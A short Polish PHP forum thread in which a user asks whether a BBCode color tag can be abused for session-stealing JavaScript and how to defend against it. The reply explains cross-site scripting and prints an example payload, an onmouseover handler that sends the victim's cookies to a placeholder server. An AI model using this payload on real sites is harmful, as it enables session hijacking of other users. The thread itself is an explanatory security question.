![]() |
![]() |
![]() ![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 72 Pomógł: 0 Dołączył: 15.06.2007 Ostrzeżenie: (0%) ![]() ![]() |
Witam.
Mam bbcode z TAGiem color takiej budowy:
No i doszły mnie słuchy iż w takie coś można "wszczepić" złośliwe js przechwytujące sesje i wysyłające na zewnętrzny serwer, czy to prawda...? Jeśli tak to jak się przed czymś takim bronić? (IMG:http://forum.php.pl/style_emoticons/default/worriedsmiley.gif) Ten post edytował Ania-678 21.07.2007, 09:12:12 |
|
|
![]() |
![]()
Post
#2
|
|
Grupa: Zarejestrowani Postów: 338 Pomógł: 2 Dołączył: 17.05.2003 Skąd: Kraków , Londyn Ostrzeżenie: (0%) ![]() ![]() |
Dziala to tak ze ktos daje onmmouse over albo onclick albo inna akcje i dalesz czesc kodu wyglada tak np:
Kod ... onmouseover="document.location.href='http://serwer/zapisz.php?c='+document.cookies " ... Pozwala to na ustawienie komus tego samego ciastka ktore ty masz z aktywna sesja np logowania. |
|
|
![]() ![]() |
![]() |
Aktualny czas: 14.10.2025 - 03:20 |